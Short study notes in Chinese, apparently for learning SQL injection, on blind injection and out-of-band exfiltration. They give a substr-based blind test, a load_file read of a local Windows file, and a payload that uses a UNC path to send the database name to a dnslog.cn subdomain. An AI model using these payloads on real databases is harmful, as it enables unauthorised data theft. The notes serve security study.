有注入漏洞时
数据可以外带 oob out fo band
盲注:
substr(database(),1,1)='a'
DNS解析
dnslog.cn
读取本地文件
load_file("c:/windows/1.txt"
远程读取文件
unc路径 //
load_file(concat('//',(select database()),'.6u0bvl.dnslog.cn/t.txt'))
可以看到数据库名
有可能大小写有问题,最好转为16进制的
hex(database())